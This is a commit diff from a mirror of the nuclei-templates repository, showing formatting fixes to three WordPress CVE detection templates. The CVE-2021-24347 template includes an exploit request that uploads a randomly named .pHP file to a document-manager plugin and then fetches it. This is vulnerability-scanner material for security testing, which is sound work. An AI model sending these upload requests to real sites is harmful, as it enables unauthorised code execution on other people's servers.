daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

dashboard gremlins

patch-1
sullo 2023-03-27 09:37:36 -04:00
parent c85f239339
commit 2d86242a2d
3 changed files with 6 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
cves/2015/CVE-2015-9312.yaml
View File

@ -5,7 +5,7 @@ info:
author: r3Y3r53 author: r3Y3r53
severity: medium severity: medium
description: | description: |
WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file âincludes/nsp_search.phpâ, several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack. WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file "includes/nsp_search.php", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.
reference: reference:
- https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054
- https://g0blin.co.uk/g0blin-00057/ - https://g0blin.co.uk/g0blin-00057/

1
cves/2021/CVE-2021-24155.yaml
View File

@ -55,6 +55,7 @@ requests:
GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1 GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
req-condition: true req-condition: true
cookie-reuse: true cookie-reuse: true
matchers-condition: and matchers-condition: and

4
cves/2021/CVE-2021-24347.yaml
View File

@ -49,10 +49,12 @@ requests:
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-name" Content-Disposition: form-data; name="dlg-upload-name"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename="" Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
Content-Type: application/octet-stream Content-Type: application/octet-stream
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP" Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
Content-Type: image/svg+xml Content-Type: image/svg+xml
@ -65,12 +67,14 @@ requests:
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-notes" Content-Disposition: form-data; name="dlg-upload-notes"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="sp-cdm-community-upload" Content-Disposition: form-data; name="sp-cdm-community-upload"
Upload Upload
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy-- ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
- | - |
GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1 GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}